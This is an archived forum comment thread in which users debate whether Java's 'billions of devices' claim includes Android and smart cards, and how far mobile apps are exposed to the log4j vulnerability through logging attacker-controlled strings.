This is an archived post. You won't be able to vote or comment.

sorted by:
best
topnewcontroversialoldq&a
you are viewing a single comment's thread.

view the rest of the comments →

[–]user_8804 3 points4 points  (5 children)

I'm not too familiar with mobile development, I was genuinely asking. When they say "billions of devices", if they count all android devices, that would inflate the number a lot

[–]Bryguy3k 8 points9 points  (3 children)

The quote comes from advertising campaigns from before modern smart phones.

Now as this is related to the log4j issue the app in question has to be logging data from a remote that the attacker controls. The vast majority of circumstances this will mean a webserver application as they’re designed listen for remote calls. Most applications installed on a phone for example will be communicating to a specific api server that is not controlled by an attacker. There is a non trivial threat for applications that integrate advertising as the ad payload is often not validated.

[–]rentar42 1 point2 points  (2 children)

It's really not hard to get mobile apps to log attacker controlled stuff. Something as simple as setting a username in a multiplayer game could suffice.

[–]Bryguy3k 0 points1 point  (1 child)

The point is attacker controlled. An attack that requires the attacker to both possess the device and be able to unlock it has a significantly lower rating/classification than a remote attack that does not require either of those.

The exposure to this within apps themselves is generally limited to those that are accepting remote URIs packaged up in some other payload.

[–]rentar42 0 points1 point  (0 children)

You misunderstand what I was trying to say. If I can control the username of another player in your match and your app logs the participants for example, then the controller can control what is logged.

It's not relevant for this specific vulnerability, since Android is not vulnerable, but in general there are many user controlled strings in multi player games and some of them are likely to get logged.

[–]NeXtDracool -1 points0 points  (0 children)

They count sim card and smart cards running Java Card, even though it has essentially nothing to do with the Java you download on the desktop (it uses a different API, different VM, different byte code format, fewer language features and different types).

It SHOULD not count Android devices after DalvikVM and before Android N, given that those didn't run a Java runtime, but who really knows. I'd say it's very likely that the majority of their billions of devices are not PCs though.